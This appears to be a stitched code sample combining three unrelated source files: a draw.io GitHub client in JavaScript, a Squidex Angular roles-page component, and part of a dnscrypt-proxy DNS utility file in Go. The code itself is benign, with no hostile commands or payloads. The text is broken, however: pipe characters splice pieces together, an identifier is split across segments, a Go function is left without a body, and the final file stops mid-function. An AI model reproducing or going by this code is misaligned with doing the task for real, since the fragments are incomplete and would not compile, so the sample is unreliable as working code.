/\.pdf$/i.test(path) || (!this.ui.useCanvasForExport && binary)))
{
// Should never be null
if (this.token != null)
{
var url = this.baseUrl + '/repos/' + org + '/' + repo + '/contents/' +
path + '?ref=' + ref + '&token=' + this.token;
tokens = path.split('/');
var name = (tokens.length > 0) ? tokens[tokens.length - 1] : path;
this.ui.convertFile(url, name, null, this.extension, success, error);
}
else
{
error({message: mxResources.get('accessDenied')});
}
}
else
{
// Adds random parameter to bypass cache
var rnd = '&t=' + new Date().getTime();
var req = new mxXmlRequest(this.baseUrl + '/repos/' + org + '/' + repo +
'/contents/' + path + '?ref=' + ref + rnd, null, 'GET');
this.executeRequest(req, mxUtils.bind(this, function(req)
{
try
{
success(this.createGitHubFile(org, repo, ref, JSON.parse(req.getText()), asLibrary));
}
catch (e)
{
error(e);
}
}), error);
}
};
/**
 * Creates a GitHubFile or GitHubLibrary from the given API response data,
 * decoding base64 content and handling image formats.
 */
GitHubClient.prototype.createGitHubFile = function(org, repo, ref, data, asLibrary)
{
var meta = {'org': org, 'repo': repo, 'ref': ref, 'name': data.name,
'path': data.path, 'sha': data.sha, 'html_url': data.html_url,
'download_url': data.download_url};
var content = data.content;
if (data.encoding === 'base64')
{
if (/\.jpe?g$/i.test(data.name))
{
content = 'data:image/jpeg;base64,' + content;
}
else if (/\.gif$/i.test(data.name))
{
content = 'data:image/gif;base64,' + content;
}
else
{
if (/\.png$/i.test(data.name))
{
var xml = this.ui.extractGraphModelFromPng(content);
if (xml != null && xml.length > 0)
{
content = xml;
}
else
{
content = 'data:image/png;base64,' + content;
}
}
else
{
content = Base64.decode(content);
}
}
}
return (asLibrary) ? new GitHubLibrary(this.ui, content, meta) : new GitHubFile(this.ui, content, meta);
};
/**
 * Inserts the given library file into the given folder.
 */
GitHubClient.prototype.insertLibrary = function(filename, data, success, error, folderId)
{
this.insertFile(filename, data, success, error, true, folderId, false);
};
/**
 * Inserts a file with the given data into the given folder, asking to
 * replace an existing file of the same name.
 */
GitHubClient.prototype.insertFile = function(filename, data, success, error, asLibrary, folderId, base64Encoded)
{
asLibrary = (asLibrary != null) ? asLibrary : false;
var tokens = folderId.split('/');
var org = tokens[0];
var repo = tokens[1];
var ref = tokens[2];
var path = tokens.slice(3, tokens.length).join('/');
if (path.length > 0)
{
path = path + '/';
}
path = path + filename;
this.checkExists(org + '/' + repo + '/' + ref + '/' + path, true, mxUtils.bind(this, function(checked, sha)
{
if (checked)
{
// Does not insert file here as there is another writeFile implicit via fileCreated
if (!asLibrary)
{
success(new GitHubFile(this.ui, data, {'org': org, 'repo': repo, 'ref': ref,
'name': filename, 'path': path, 'sha': sha, isNew: true}));
}
else
{
if (!base64Encoded)
{
data = Base64.encode(data);
}
this.showCommitDialog(filename, true, mxUtils.bind(this, function(message)
{
this.writeFile(org, repo, ref, path, message, data, sha, mxUtils.bind(this, function(req)
{
try
{
var msg = JSON.parse(req.getText());
success(this.createGitHubFile(org, repo, ref, msg.content, asLibrary));
}
catch (e)
{
error(e);
}
}), error);
}), error);
}
}
else
{
error();
}
}));
};
/**
 * Shows a dialog asking for a commit message.
 */
GitHubClient.prototype.showCommitDialog = function(filename, isNew, success, cancel)
{
// Pauses spinner while commit message dialog is shown
var resume = this.ui.spinner.pause();
var dlg = new FilenameDialog(this.ui, mxResources.get((isNew) ? 'addedFile' : 'updateFile',
[filename]), mxResources.get('ok'), mxUtils.bind(this, function(message)
{
resume();
success(message);
}), mxResources.get('commitMessage'), null, null, null, null, mxUtils.bind(this, function()
{
cancel();
}), null, 280);
this.ui.showDialog(dlg.container, 400, 80, true, false);
dlg.init();
};
/**
 * Writes the given data to the given path via the GitHub contents API.
 */
GitHubClient.prototype.writeFile = function(org, repo, ref, path, message, data, sha, success, error)
{
if (data.length >= this.maxFileSize)
{
error({message: mxResources.get('drawingTooLarge') + ' (' +
this.ui.formatFileSize(data.length) + ' / 1 MB)'});
}
else
{
var entity =
{
path: path,
branch: decodeURIComponent(ref),
message: message,
content: data
};
if (sha != null)
{
entity.sha = sha;
}
var req = new mxXmlRequest(this.baseUrl + '/repos/' + org + '/' + repo +
'/contents/' + path, JSON.stringify(entity), 'PUT');
this.executeRequest(req, mxUtils.bind(this, function(req)
{
success(req);
}), mxUtils.bind(this, function(err)
{
if (err.code == 404)
{
err.helpLink = 'https://github.com/settings/connections/applications/' + this.clientId;
err.code = null;
}
error(err);
}));
}
};
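// For reference, the request above follows the GitHub contents API; a
// sketch of the payload (all values illustrative):
//
//   PUT /repos/:org/:repo/contents/:path
//   {"path": "docs/diagram.drawio", "branch": "master",
//    "message": "Update diagram", "content": "<base64 data>", "sha": "<previous sha>"}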
/**
 * Checks if a file exists at the given path and optionally asks whether
 * to replace it.
 */
GitHubClient.prototype.checkExists = function(path, askReplace, fn)
{
var tokens = path.split('/');
var org = tokens[0];
var repo = tokens[1];
var ref = tokens[2];
path = tokens.slice(3, tokens.length).join('/');
this.getSha(org, repo, path, ref, mxUtils.bind(this, function(sha)
{
if (askReplace)
{
var resume = this.ui.spinner.pause();
this.ui.confirm(mxResources.get('replaceIt', [path]), function()
{
resume();
fn(true, sha);
}, function()
{
resume();
fn(false);
});
}
else
{
this.ui.spinner.stop();
this.ui.showError(mxResources.get('error'), mxResources.get('fileExists'), mxResources.get('ok'), function()
{
fn(false);
});
}
}), mxUtils.bind(this, function(err)
{
fn(true);
}), null, true);
};
/**
 * Saves the given file, optionally fetching the latest SHA first when
 * overwriting.
 */
GitHubClient.prototype.saveFile = function(file, success, error, overwrite, message)
{
var org = file.meta.org;
var repo = file.meta.repo;
var ref = file.meta.ref;
var path = file.meta.path;
var fn = mxUtils.bind(this, function(sha, data)
{
this.writeFile(org, repo, ref, path, message, data, sha,
mxUtils.bind(this, function(req)
{
delete file.meta.isNew;
success(JSON.parse(req.getText()).content.sha);
}), mxUtils.bind(this, function(err)
{
error(err);
}));
});
var fn2 = mxUtils.bind(this, function()
{
if (this.ui.useCanvasForExport && /(\.png)$/i.test(path))
{
this.ui.getEmbeddedPng(mxUtils.bind(this, function(data)
{
fn(file.meta.sha, data);
}), error, (this.ui.getCurrentFile() != file) ? file.getData() : null);
}
else
{
fn(file.meta.sha, Base64.encode(file.getData()));
}
});
if (overwrite)
{
this.getSha(org, repo, path, ref, mxUtils.bind(this, function(sha)
{
file.meta.sha = sha;
fn2();
}), error);
}
else
{
fn2();
}
};
/**
 * Shows the file picker for selecting a library.
 */
GitHubClient.prototype.pickLibrary = function(fn)
{
this.pickFile(fn);
};
/**
 * Shows the GitHub dialog for selecting a folder.
 */
GitHubClient.prototype.pickFolder = function(fn)
{
this.showGitHubDialog(false, fn);
};
/**
 * Shows the GitHub dialog for selecting a file and loads it.
 */
GitHubClient.prototype.pickFile = function(fn)
{
fn = (fn != null) ? fn : mxUtils.bind(this, function(path)
{
this.ui.loadFile('H' + encodeURIComponent(path));
});
this.showGitHubDialog(true, fn);
};
/**
 * Shows the repository, branch and file browser dialog.
 */
GitHubClient.prototype.showGitHubDialog = function(showFiles, fn)
{
var org = null;
var repo = null;
var ref = null;
var path = null;
var content = document.createElement('div');
content.style.whiteSpace = 'nowrap';
content.style.overflow = 'hidden';
content.style.height = '304px';
var hd = document.createElement('h3');
mxUtils.write(hd, mxResources.get((showFiles) ? 'selectFile' : 'selectFolder'));
hd.style.cssText = 'width:100%;text-align:center;margin-top:0px;margin-bottom:12px';
content.appendChild(hd);
var div = document.createElement('div');
div.style.whiteSpace = 'nowrap';
div.style.border = '1px solid lightgray';
div.style.boxSizing = 'border-box';
div.style.padding = '4px';
div.style.overflow = 'auto';
div.style.lineHeight = '1.2em';
div.style.height = '274px';
content.appendChild(div);
var listItem = document.createElement('div');
listItem.style.textOverflow = 'ellipsis';
listItem.style.boxSizing = 'border-box';
listItem.style.overflow = 'hidden';
listItem.style.padding = '4px';
listItem.style.width = '100%';
var dlg = new CustomDialog(this.ui, content, mxUtils.bind(this, function()
{
fn(org + '/' + repo + '/' + encodeURIComponent(ref) + '/' + path);
}));
this.ui.showDialog(dlg.container, 420, 360, true, true);
if (showFiles)
{
dlg.okButton.parentNode.removeChild(dlg.okButton);
}
var createLink = mxUtils.bind(this, function(label, fn, padding)
{
var link = document.createElement('a');
link.setAttribute('href', 'javascript:void(0);');
link.setAttribute('title', label);
mxUtils.write(link, label);
mxEvent.addListener(link, 'click', fn);
if (padding != null)
{
var temp = listItem.cloneNode();
temp.style.padding = padding;
temp.appendChild(link);
link = temp;
}
return link;
});
var updatePathInfo = mxUtils.bind(this, function(hideRef)
{
var pathInfo = document.createElement('div');
pathInfo.style.marginBottom = '8px';
pathInfo.appendChild(createLink(org + '/' + repo, mxUtils.bind(this, function()
{
path = null;
selectRepo();
})));
if (!hideRef)
{
mxUtils.write(pathInfo, ' / ');
pathInfo.appendChild(createLink(decodeURIComponent(ref), mxUtils.bind(this, function()
{
path = null;
selectRef();
})));
}
if (path != null && path.length > 0)
{
var tokens = path.split('/');
for (var i = 0; i < tokens.length; i++)
{
(function(index)
{
mxUtils.write(pathInfo, ' / ');
pathInfo.appendChild(createLink(tokens[index], mxUtils.bind(this, function()
{
path = tokens.slice(0, index + 1).join('/');
selectFile();
})));
})(i);
}
}
div.appendChild(pathInfo);
});
var error = mxUtils.bind(this, function(err)
{
this.ui.handleError(err, null, mxUtils.bind(this, function()
{
this.ui.spinner.stop();
if (this.getUser() != null)
{
org = null;
repo = null;
ref = null;
path = null;
selectRepo();
}
else
{
this.ui.hideDialog();
}
| });
// Adds paging for repos, branches and files (files limited to 1000 by API)
var nextPageDiv = null;
var scrollFn = null;
var pageSize = 100;
var selectFile = mxUtils.bind(this, function(page)
{
if (page == null)
{
div.innerHTML = '';
page = 1;
}
var req = new mxXmlRequest(this.baseUrl + '/repos/' + org + '/' + repo +
'/contents/' + path + '?ref=' + encodeURIComponent(ref) +
'&per_page=' + pageSize + '&page=' + page, null, 'GET');
this.ui.spinner.spin(div, mxResources.get('loading'));
dlg.okButton.removeAttribute('disabled');
if (scrollFn != null)
{
mxEvent.removeListener(div, 'scroll', scrollFn);
scrollFn = null;
}
if (nextPageDiv != null && nextPageDiv.parentNode != null)
{
nextPageDiv.parentNode.removeChild(nextPageDiv);
}
nextPageDiv = document.createElement('a');
nextPageDiv.style.display = 'block';
nextPageDiv.setAttribute('href', 'javascript:void(0);');
mxUtils.write(nextPageDiv, mxResources.get('more') + '...');
var nextPage = mxUtils.bind(this, function()
{
selectFile(page + 1);
});
mxEvent.addListener(nextPageDiv, 'click', nextPage);
this.executeRequest(req, mxUtils.bind(this, function(req)
{
this.ui.spinner.stop();
if (page == 1)
{
updatePathInfo();
div.appendChild(createLink('../ [Up]', mxUtils.bind(this, function()
{
if (path == '')
{
path = null;
selectRepo();
}
else
{
var tokens = path.split('/');
path = tokens.slice(0, tokens.length - 1).join('/');
selectFile();
}
}), '4px'));
}
var files = JSON.parse(req.getText());
if (files == null || files.length == 0)
{
mxUtils.write(div, mxResources.get('noFiles'));
}
else
{
var gray = true;
var count = 0;
var listFiles = mxUtils.bind(this, function(showFolders)
{
for (var i = 0; i < files.length; i++)
{
(mxUtils.bind(this, function(file, idx)
{
if (showFolders == (file.type == 'dir'))
{
var temp = listItem.cloneNode();
temp.style.backgroundColor = (gray) ? '#eeeeee' : '';
gray = !gray;
var typeImg = document.createElement('img');
typeImg.src = IMAGE_PATH + '/' + (file.type == 'dir'? 'folder.png' : 'file.png');
typeImg.setAttribute('align', 'absmiddle');
typeImg.style.marginRight = '4px';
typeImg.style.marginTop = '-4px';
typeImg.width = 20;
temp.appendChild(typeImg);
temp.appendChild(createLink(file.name + ((file.type == 'dir') ? '/' : ''), mxUtils.bind(this, function()
{
if (file.type == 'dir')
{
path = file.path;
selectFile();
}
else if (showFiles && file.type == 'file')
{
this.ui.hideDialog();
fn(org + '/' + repo + '/' + encodeURIComponent(ref) + '/' + file.path);
}
})));
div.appendChild(temp);
count++;
}
}))(files[i], i);
}
});
listFiles(true);
if (showFiles)
{
listFiles(false);
}
// LATER: Paging not supported for contents in GitHub
// if (count == pageSize)
// {
// div.appendChild(nextPageDiv);
//
// scrollFn = function()
// {
// if (div.scrollTop >= div.scrollHeight - div.offsetHeight)
// {
// nextPage();
// }
// };
//
// mxEvent.addListener(div, 'scroll', scrollFn);
// }
}
}), error, true);
});
var selectRef = mxUtils.bind(this, function(page)
{
if (page == null)
{
div.innerHTML = '';
page = 1;
}
var req = new mxXmlRequest(this.baseUrl + '/repos/' + org + '/' + repo +
'/branches?per_page=' + pageSize + '&page=' + page, null, 'GET');
dlg.okButton.setAttribute('disabled', 'disabled');
this.ui.spinner.spin(div, mxResources.get('loading'));
if (scrollFn != null)
{
mxEvent.removeListener(div, 'scroll', scrollFn);
scrollFn = null;
}
if (nextPageDiv != null && nextPageDiv.parentNode != null)
{
nextPageDiv.parentNode.removeChild(nextPageDiv);
}
nextPageDiv = document.createElement('a');
nextPageDiv.style.display = 'block';
nextPageDiv.setAttribute('href', 'javascript:void(0);');
mxUtils.write(nextPageDiv, mxResources.get('more') + '...');
var nextPage = mxUtils.bind(this, function()
{
selectRef(page + 1);
});
mxEvent.addListener(nextPageDiv, 'click', nextPage);
this.executeRequest(req, mxUtils.bind(this, function(req)
{
this.ui.spinner.stop();
if (page == 1)
{
updatePathInfo(true);
div.appendChild(createLink('../ [Up]', mxUtils.bind(this, function()
{
path = null;
selectRepo();
}), '4px'));
}
var branches = JSON.parse(req.getText());
if (branches == null || branches.length == 0)
{
mxUtils.write(div, mxResources.get('noFiles'));
}
else
{
for (var i = 0; i < branches.length; i++)
{
(mxUtils.bind(this, function(branch, idx)
{
var temp = listItem.cloneNode();
temp.style.backgroundColor = (idx % 2 == 0) ? '#eeeeee' : '';
temp.appendChild(createLink(branch.name, mxUtils.bind(this, function()
{
ref = branch.name;
path = '';
selectFile();
})));
div.appendChild(temp);
}))(branches[i], i);
}
if (branches.length == pageSize)
{
div.appendChild(nextPageDiv);
scrollFn = function()
{
if (div.scrollTop >= div.scrollHeight - div.offsetHeight)
{
nextPage();
}
};
mxEvent.addListener(div, 'scroll', scrollFn);
}
}
}), error);
});
var selectRepo = mxUtils.bind(this, function(page)
{
if (page == null)
{
div.innerHTML = '';
page = 1;
}
var req = new mxXmlRequest(this.baseUrl + '/user/repos?per_page=' +
pageSize + '&page=' + page, null, 'GET');
dlg.okButton.setAttribute('disabled', 'disabled');
this.ui.spinner.spin(div, mxResources.get('loading'));
if (scrollFn != null)
{
mxEvent.removeListener(div, 'scroll', scrollFn);
}
if (nextPageDiv != null && nextPageDiv.parentNode != null)
{
nextPageDiv.parentNode.removeChild(nextPageDiv);
}
nextPageDiv = document.createElement('a');
nextPageDiv.style.display = 'block';
nextPageDiv.setAttribute('href', 'javascript:void(0);');
mxUtils.write(nextPageDiv, mxResources.get('more') + '...');
var nextPage = mxUtils.bind(this, function()
{
selectRepo(page + 1);
});
mxEvent.addListener(nextPageDiv, 'click', nextPage);
this.executeRequest(req, mxUtils.bind(this, function(req)
{
this.ui.spinner.stop();
var repos = JSON.parse(req.getText());
if (repos == null || repos.length == 0)
{
mxUtils.write(div, mxResources.get('noFiles'));
}
else
{
if (page == 1)
{
div.appendChild(createLink(mxResources.get('enterValue') + '...', mxUtils.bind(this, function()
{
var dlg = new FilenameDialog(this.ui, 'org/repo/ref', mxResources.get('ok'), mxUtils.bind(this, function(value)
{
if (value != null)
{
var tokens = value.split('/');
if (tokens.length > 1)
{
var tmpOrg = tokens[0];
var tmpRepo = tokens[1];
if (tokens.length < 3)
{
org = tmpOrg;
repo = tmpRepo;
ref = null;
path = null;
selectRef();
}
else if (this.ui.spinner.spin(div, mxResources.get('loading')))
{
var tmpRef = encodeURIComponent(tokens.slice(2, tokens.length).join('/'));
this.getFile(tmpOrg + '/' + tmpRepo + '/' + tmpRef, mxUtils.bind(this, function(file)
{
this.ui.spinner.stop();
org = file.meta.org;
repo = file.meta.repo;
ref = decodeURIComponent(file.meta.ref);
path = '';
selectFile();
}), mxUtils.bind(this, function(err)
{
this.ui.spinner.stop();
this.ui.handleError({message: mxResources.get('fileNotFound')});
}));
}
}
else
{
this.ui.spinner.stop();
this.ui.handleError({message: mxResources.get('invalidName')});
}
}
}), mxResources.get('enterValue'));
this.ui.showDialog(dlg.container, 300, 80, true, false);
dlg.init();
})));
mxUtils.br(div);
mxUtils.br(div);
}
for (var i = 0; i < repos.length; i++)
{
(mxUtils.bind(this, function(repository, idx)
{
var temp = listItem.cloneNode();
temp.style.backgroundColor = (idx % 2 == 0) ? '#eeeeee' : '';
temp.appendChild(createLink(repository.full_name, mxUtils.bind(this, function()
{
org = repository.owner.login;
repo = repository.name;
ref = repository.default_branch;
path = '';
selectFile();
})));
div.appendChild(temp);
}))(repos[i], i);
}
}
if (repos.length == pageSize)
{
div.appendChild(nextPageDiv);
scrollFn = function()
{
if (div.scrollTop >= div.scrollHeight - div.offsetHeight)
{
nextPage();
}
};
mxEvent.addListener(div, 'scroll', scrollFn);
}
}), error);
});
selectRepo();
};
/**
 * Clears the persistent token and resets the user state.
 */
GitHubClient.prototype.logout = function()
{
this.clearPersistentToken();
this.setUser(null);
this.token = null;
}; | }));
|
roles-page.component.ts | /*
* Squidex Headless CMS
*
* @license
* Copyright (c) Squidex UG (haftungsbeschränkt). All rights reserved.
*/
import { Component, OnInit } from '@angular/core';
import { FormBuilder } from '@angular/forms';
import { Observable, of } from 'rxjs';
import {
AddRoleForm,
AppsState,
AutocompleteSource,
RoleDto,
RolesService,
RolesState
} from '@app/shared';
class PermissionsAutocomplete implements AutocompleteSource {
private permissions: string[] = [];
constructor(appsState: AppsState, rolesService: RolesService) {
rolesService.getPermissions(appsState.appName).subscribe(x => this.permissions = x);
}
public find(query: string): Observable<any[]> {
return of(this.permissions.filter(y => y.indexOf(query) === 0));
}
}
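// Usage sketch (the query string is hypothetical): an autocomplete control
// calls find() with the current input and renders the prefix matches:
//
//   const source = new PermissionsAutocomplete(appsState, rolesService);
//   source.find('schemas.').subscribe(matches => console.log(matches));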
@Component({
selector: 'sqx-roles-page',
styleUrls: ['./roles-page.component.scss'],
templateUrl: './roles-page.component.html'
})
export class R | implements OnInit {
public addRoleForm = new AddRoleForm(this.formBuilder);
public allPermissions: AutocompleteSource = new PermissionsAutocomplete(this.appsState, this.rolesService);
constructor(
public readonly appsState: AppsState,
public readonly rolesService: RolesService,
public readonly rolesState: RolesState,
private readonly formBuilder: FormBuilder
) {
}
public ngOnInit() {
this.rolesState.load();
}
public reload() {
this.rolesState.load(true);
}
public cancelAddRole() {
this.addRoleForm.submitCompleted();
}
public addRole() {
const value = this.addRoleForm.submit();
if (value) {
this.rolesState.add(value)
.subscribe(() => {
this.addRoleForm.submitCompleted();
}, error => {
this.addRoleForm.submitFailed(error);
});
}
}
public trackByRole(index: number, role: RoleDto) {
return role.name;
}
}
| olesPageComponent |
dnsutils.go | package main
import (
"encoding/binary"
"errors"
"net"
"strings"
"time"
"unicode/utf8"
"github.com/jedisct1/dlog"
"github.com/miekg/dns"
)
func EmptyResponseFromMessage(srcMsg *dns.Msg) *dns.Msg {
dstMsg := dns.Msg{MsgHdr: srcMsg.MsgHdr, Compress: true}
dstMsg.Question = srcMsg.Question
dstMsg.Response = true
if srcMsg.RecursionDesired {
dstMsg.RecursionAvailable = true
}
dstMsg.RecursionDesired = false
dstMsg.CheckingDisabled = false
dstMsg.AuthenticatedData = false
if edns0 := srcMsg.IsEdns0(); edns0 != nil {
dstMsg.SetEdns0(edns0.UDPSize(), edns0.Do())
}
return &dstMsg
}
func TruncatedResponse(packet []byte) ([]byte, error) {
srcMsg := dns.Msg{}
if err := srcMsg.Unpack(packet); err != nil {
return nil, err
}
dstMsg := EmptyResponseFromMessage(&srcMsg)
dstMsg.Truncated = true
return dstMsg.Pack()
}
func RefusedResponseFromMessage(srcMsg *dns.Msg, refusedCode bool, ipv4 net.IP, ipv6 net.IP, ttl uint32) *dns.Msg {
dstMsg := EmptyResponseFromMessage(srcMsg)
if refusedCode {
dstMsg.Rcode = dns.RcodeRefused
} else {
dstMsg.Rcode = dns.RcodeSuccess
questions := srcMsg.Question
if len(questions) == 0 {
return dstMsg
}
question := questions[0]
sendHInfoResponse := true
if ipv4 != nil && question.Qtype == dns.TypeA {
rr := new(dns.A)
rr.Hdr = dns.RR_Header{Name: question.Name, Rrtype: dns.TypeA, Class: dns.ClassINET, Ttl: ttl}
rr.A = ipv4.To4()
if rr.A != nil {
dstMsg.Answer = []dns.RR{rr}
sendHInfoResponse = false
}
} else if ipv6 != nil && question.Qtype == dns.TypeAAAA {
rr := new(dns.AAAA)
rr.Hdr = dns.RR_Header{Name: question.Name, Rrtype: dns.TypeAAAA, Class: dns.ClassINET, Ttl: ttl}
rr.AAAA = ipv6.To16()
if rr.AAAA != nil {
dstMsg.Answer = []dns.RR{rr}
sendHInfoResponse = false
}
}
if sendHInfoResponse {
hinfo := new(dns.HINFO)
hinfo.Hdr = dns.RR_Header{Name: question.Name, Rrtype: dns.TypeHINFO,
Class: dns.ClassINET, Ttl: ttl}
hinfo.Cpu = "This query has been locally blocked"
hinfo.Os = "by dnscrypt-proxy"
dstMsg.Answer = []dns.RR{hinfo}
}
}
return dstMsg
}
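// Example (sketch): for a blocked A query with refusedCode=false and a
// configured ipv4, the caller receives a synthesized A record with the
// given TTL; when no matching address is configured, an HINFO record
// marks the block instead.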
func HasTCFlag(packet []byte) bool |
func TransactionID(packet []byte) uint16 {
return binary.BigEndian.Uint16(packet[0:2])
}
func SetTransactionID(packet []byte, tid uint16) {
binary.BigEndian.PutUint16(packet[0:2], tid)
}
func Rcode(packet []byte) uint8 {
return packet[3] & 0xf
}
func NormalizeRawQName(name *[]byte) {
for i, c := range *name {
if c >= 65 && c <= 90 {
(*name)[i] = c + 32
}
}
}
func NormalizeQName(str string) (string, error) {
if len(str) == 0 || str == "." {
return ".", nil
}
hasUpper := false
str = strings.TrimSuffix(str, ".")
strLen := len(str)
for i := 0; i < strLen; i++ {
c := str[i]
if c >= utf8.RuneSelf {
return str, errors.New("Query name is not an ASCII string")
}
hasUpper = hasUpper || ('A' <= c && c <= 'Z')
}
if !hasUpper {
return str, nil
}
var b strings.Builder
b.Grow(len(str))
for i := 0; i < strLen; i++ {
c := str[i]
if 'A' <= c && c <= 'Z' {
c += 'a' - 'A'
}
b.WriteByte(c)
}
return b.String(), nil
}
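// Example (sketch): NormalizeQName("Example.COM.") returns "example.com",
// trimming the trailing dot and lowercasing; non-ASCII names yield an error.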
func getMinTTL(msg *dns.Msg, minTTL uint32, maxTTL uint32, cacheNegMinTTL uint32, cacheNegMaxTTL uint32) time.Duration {
if (msg.Rcode != dns.RcodeSuccess && msg.Rcode != dns.RcodeNameError) || (len(msg.Answer) <= 0 && len(msg.Ns) <= 0) {
return time.Duration(cacheNegMinTTL) * time.Second
}
var ttl uint32
if msg.Rcode == dns.RcodeSuccess {
ttl = maxTTL
} else {
ttl = cacheNegMaxTTL
}
if len(msg.Answer) > 0 {
for _, rr := range msg.Answer {
if rr.Header().Ttl < ttl {
ttl = rr.Header().Ttl
}
}
} else {
for _, rr := range msg.Ns {
if rr.Header().Ttl < ttl {
ttl = rr.Header().Ttl
}
}
}
if msg.Rcode == dns.RcodeSuccess {
if ttl < minTTL {
ttl = minTTL
}
} else {
if ttl < cacheNegMinTTL {
ttl = cacheNegMinTTL
}
}
return time.Duration(ttl) * time.Second
}
func setMaxTTL(msg *dns.Msg, ttl uint32) {
for _, rr := range msg.Answer {
if ttl < rr.Header().Ttl {
rr.Header().Ttl = ttl
}
}
for _, rr := range msg.Ns {
if ttl < rr.Header().Ttl {
rr.Header().Ttl = ttl
}
}
for _, rr := range msg.Extra {
header := rr.Header()
if header.Rrtype == dns.TypeOPT {
continue
}
if ttl < rr.Header().Ttl {
rr.Header().Ttl = ttl
}
}
}
func updateTTL(msg *dns.Msg, expiration time.Time) {
until := time.Until(expiration)
ttl := uint32(0)
if until > 0 {
ttl = uint32(until / time.Second)
if until-time.Duration(ttl)*time.Second >= time.Second/2 {
ttl += 1
}
}
for _, rr := range msg.Answer {
rr.Header().Ttl = ttl
}
for _, rr := range msg.Ns {
rr.Header().Ttl = ttl
}
for _, rr := range msg.Extra {
if rr.Header().Rrtype != dns.TypeOPT {
rr.Header().Ttl = ttl
}
}
}
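// Example (sketch): with 90.6s left until expiration, ttl is 90 plus 1 for
// the 0.6s remainder, i.e. TTLs are rounded to the nearest second (91).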
func hasEDNS0Padding(packet []byte) (bool, error) {
msg := dns.Msg{}
if err := msg.Unpack(packet); err != nil {
return false, err
}
if edns0 := msg.IsEdns0(); edns0 != nil {
for _, option := range edns0.Option {
if option.Option() == dns.EDNS0PADDING {
return true, nil
}
}
}
return false, nil
}
func addEDNS0PaddingIfNoneFound(msg *dns.Msg, unpaddedPacket []byte, paddingLen int) ([]byte, error) {
edns0 := msg.IsEdns0()
if edns0 == nil {
msg.SetEdns0(uint16(MaxDNSPacketSize), false)
edns0 = msg.IsEdns0()
if edns0 == nil {
return unpaddedPacket, nil
}
}
for _, option := range edns0.Option {
if option.Option() == dns.EDNS0PADDING {
return unpaddedPacket, nil
}
}
ext := new(dns.EDNS0_PADDING)
padding := make([]byte, paddingLen)
for i := range padding {
padding[i] = 'X'
}
ext.Padding = padding[:paddingLen]
edns0.Option = append(edns0.Option, ext)
return msg.Pack()
}
func removeEDNS0Options(msg *dns.Msg) bool {
edns0 := msg.IsEdns0()
if edns0 == nil {
return false
}
edns0.Option = []dns.EDNS0{}
return true
}
func isDigit(b byte) bool { return b >= '0' && b <= '9' }
func dddToByte(s []byte) byte {
return byte((s[0]-'0')*100 + (s[1]-'0')*10 + (s[2] - '0'))
}
func PackTXTRR(s string) []byte {
bs := make([]byte, len(s))
msg := make([]byte, 0)
copy(bs, s)
for i := 0; i < len(bs); i++ {
if bs[i] == '\\' {
i++
if i == len(bs) {
break
}
if i+2 < len(bs) && isDigit(bs[i]) && isDigit(bs[i+1]) && isDigit(bs[i+2]) {
msg = append(msg, dddToByte(bs[i:]))
i += 2
} else if bs[i] == 't' {
msg = append(msg, '\t')
} else if bs[i] == 'r' {
msg = append(msg, '\r')
} else if bs[i] == 'n' {
msg = append(msg, '\n')
} else {
msg = append(msg, bs[i])
}
} else {
msg = append(msg, bs[i])
}
}
return msg
}
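// Example (sketch): PackTXTRR decodes zone-file escapes, so the Go literal
// "a\\098c\\td" (i.e. `a\098c\td`) yields the bytes "abc\td" -- `\098` is
// decimal 98 ('b') and `\t` becomes a tab.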
type DNSExchangeResponse struct {
response *dns.Msg
rtt time.Duration
priority int
fragmentsBlocked bool
err error
}
func DNSExchange(proxy *Proxy, proto string, query *dns.Msg, serverAddress string, relay *DNSCryptRelay, serverName *string, tryFragmentsSupport bool) (*dns.Msg, time.Duration, bool, error) {
for {
cancelChannel := make(chan struct{})
channel := make(chan DNSExchangeResponse)
var err error
options := 0
for tries := 0; tries < 3; tries++ {
if tryFragmentsSupport {
queryCopy := query.Copy()
queryCopy.Id += uint16(options)
go func(query *dns.Msg, delay time.Duration) {
option := _dnsExchange(proxy, proto, query, serverAddress, relay, 1500)
option.fragmentsBlocked = false
option.priority = 0
channel <- option
time.Sleep(delay)
select {
case <-cancelChannel:
return
default:
}
}(queryCopy, time.Duration(200*tries)*time.Millisecond)
options++
}
queryCopy := query.Copy()
queryCopy.Id += uint16(options)
go func(query *dns.Msg, delay time.Duration) {
option := _dnsExchange(proxy, proto, query, serverAddress, relay, 480)
option.fragmentsBlocked = true
option.priority = 1
channel <- option
time.Sleep(delay)
select {
case <-cancelChannel:
return
default:
}
}(queryCopy, time.Duration(250*tries)*time.Millisecond)
options++
}
var bestOption *DNSExchangeResponse
for i := 0; i < options; i++ {
if dnsExchangeResponse := <-channel; dnsExchangeResponse.err == nil {
if bestOption == nil || dnsExchangeResponse.priority < bestOption.priority ||
(dnsExchangeResponse.priority == bestOption.priority && dnsExchangeResponse.rtt < bestOption.rtt) {
bestOption = &dnsExchangeResponse
if bestOption.priority == 0 {
close(cancelChannel)
break
}
}
} else {
err = dnsExchangeResponse.err
}
}
if bestOption != nil {
if bestOption.fragmentsBlocked {
dlog.Debugf("[%v] public key retrieval succeeded but server is blocking fragments", *serverName)
} else {
dlog.Debugf("[%v] public key retrieval succeeded", *serverName)
}
return bestOption.response, bestOption.rtt, bestOption.fragmentsBlocked, nil
}
if relay == nil || !proxy.anonDirectCertFallback {
if err == nil {
err = errors.New("Unable to reach the server")
}
return nil, 0, false, err
}
dlog.Infof("Unable to get the public key for [%v] via relay [%v], retrying over a direct connection", *serverName, relay.RelayUDPAddr.IP)
relay = nil
}
}
func _dnsExchange(proxy *Proxy, proto string, query *dns.Msg, serverAddress string, relay *DNSCryptRelay, paddedLen int) DNSExchangeResponse {
var packet []byte
var rtt time.Duration
if proto == "udp" {
qNameLen, padding := len(query.Question[0].Name), 0
if qNameLen < paddedLen {
padding = paddedLen - qNameLen
}
if padding > 0 {
opt := new(dns.OPT)
opt.Hdr.Name = "."
ext := new(dns.EDNS0_PADDING)
ext.Padding = make([]byte, padding)
opt.Option = append(opt.Option, ext)
query.Extra = []dns.RR{opt}
}
binQuery, err := query.Pack()
if err != nil {
return DNSExchangeResponse{err: err}
}
udpAddr, err := net.ResolveUDPAddr("udp", serverAddress)
if err != nil {
return DNSExchangeResponse{err: err}
}
upstreamAddr := udpAddr
if relay != nil {
proxy.prepareForRelay(udpAddr.IP, udpAddr.Port, &binQuery)
upstreamAddr = relay.RelayUDPAddr
}
now := time.Now()
pc, err := net.DialUDP("udp", nil, upstreamAddr)
if err != nil {
return DNSExchangeResponse{err: err}
}
defer pc.Close()
if err := pc.SetDeadline(time.Now().Add(proxy.timeout)); err != nil {
return DNSExchangeResponse{err: err}
